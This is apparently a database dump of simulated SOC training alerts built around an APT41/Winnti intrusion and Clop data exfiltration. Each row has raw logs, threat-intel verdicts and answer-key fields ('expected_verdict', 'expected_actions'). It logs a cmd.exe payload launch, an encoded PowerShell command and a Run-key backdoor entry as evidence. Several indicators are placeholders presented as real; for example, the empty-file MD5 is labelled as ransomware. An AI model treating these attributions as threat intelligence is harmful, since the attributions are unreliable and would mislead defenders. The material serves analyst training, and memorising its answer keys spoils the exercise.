lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1125, 'Data Exfiltration via Clop Ransomware', 'critical', 'Data Loss Prevention (DLP) Systems', 'In the final phase of the attack, Clop ransomware has been activated on host 10.1.1.15. Sensitive data is being exfiltrated to an external IP 185.83.214.42 before files are encrypted, marking the completion of the attack chain and a subsequent ransom demand. Detected malicious file hash indicates known Clop variant.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T09:45:23Z\",\"event_id\":\"dlp-00432\",\"source_ip\":\"10.1.1.15\",\"destination_ip\":\"185.83.214.42\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"sensitive_data_backup.zip\",\"username\":\"jdoe\",\"event_description\":\"Data exfiltration detected. Suspected Clop ransomware activity.\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"protocol\":\"HTTP\",\"data_size\":\"2GB\"}', '2026-02-01 13:58:57', '2026-02-16 17:48:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.83.214.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Clop ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a Clop ransomware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data_backup.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file integrity monitoring\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of exfiltrated sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1126, 'Suspicious Network Activity Detected', 'medium', 'IDS/IPS Logs', 'Initial access attempt detected from a suspicious IP address, potentially linked to the Winnti Group, exploiting a vulnerability in the game distributor network. The traffic mimics legitimate game distribution traffic to avoid detection.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:45:32Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"http_method\":\"GET\",\"url\":\"/dist/gameupdate\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"signature_id\":\"2023456\",\"signature_info\":\"Exploitation of vulnerability in game distribution\",\"malicious_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"gameupdate.exe\"}', '2026-02-01 14:01:26', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with Winnti Group activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server IP within gaming company\'s network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT41\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"gameupdate.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename used in past attacks on game distributors\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1127, 'Malicious Code Execution', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, attackers execute a payload designed to infiltrate the core systems of the gaming network, leveraging stolen code-signing certificates for legitimacy.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"EDR-20231012-003\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"executed_command\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start C:\\\\Temp\\\\malicious_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"compromised_user\",\"filename\":\"malicious_payload.exe\",\"process_id\":5678,\"code_signature\":{\"status\":\"Valid\",\"issuer\":\"Stolen Certificate Authority\"}}', '2026-02-01 14:01:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of APT41 toolkit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File associated with recent APT41 attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory Logs\",\"verdict\":\"suspicious\",\"details\":\"User account recently used to execute unauthorized actions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1128, 'Establishing Persistence - Winnti Group', 'high', 'System Logs and Registry Changes', 'The Winnti Group has deployed advanced rootkits and backdoors on the compromised host, ensuring continued access to the network even after system reboots and security patches. The presence of a suspicious registry key and a known malicious file hash indicates persistence mechanisms have been established.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:35:00Z\",\"host_ip\":\"10.0.0.200\",\"registry_change\":{\"key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\WinntiBackdoor\",\"old_value\":null,\"new_value\":\"C:\\\\Windows\\\\System32\\\\winniti.exe\"},\"file_hash_detection\":{\"file_path\":\"C:\\\\Windows\\\\System32\\\\winniti.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"external_ip\":\"203.0.113.45\",\"username\":\"compromised_user\"}', '2026-02-01 14:01:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with the Winnti Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Winnti malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Username used during the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1129, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'An intermediate-level lateral movement was detected within the network. The attackers are leveraging existing trust relationships and are targeting servers associated with game development and distribution. This activity aligns with APT41\'s known tactics and techniques.', 'Lateral Movement', 'T1078.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"10.0.2.20\",\"dst_port\":\"445\",\"protocol\":\"SMB\",\"username\":\"dev_user\",\"file_accessed\":\"game_assets_v2.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"203.0.113.45\",\"comment\":\"Suspicious SMB traffic detected from internal IP to game development server.\"}', '2026-02-01 14:01:30', '2026-02-14 16:52:12', 